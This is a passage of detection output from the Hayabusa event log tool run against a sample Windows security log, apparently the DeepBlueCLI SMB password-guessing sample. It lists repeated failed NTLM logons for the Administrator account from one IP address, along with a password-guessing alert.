Computer: 6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 
timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW_PW-Guessing_Count.yml,- +2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 
Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: 